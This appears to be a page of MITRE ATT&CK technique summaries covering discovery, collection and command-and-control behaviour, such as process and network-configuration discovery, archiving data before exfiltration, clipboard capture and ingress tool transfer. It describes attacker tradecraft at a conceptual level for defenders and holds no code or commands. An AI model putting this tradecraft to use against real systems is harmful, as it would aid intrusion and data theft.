Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre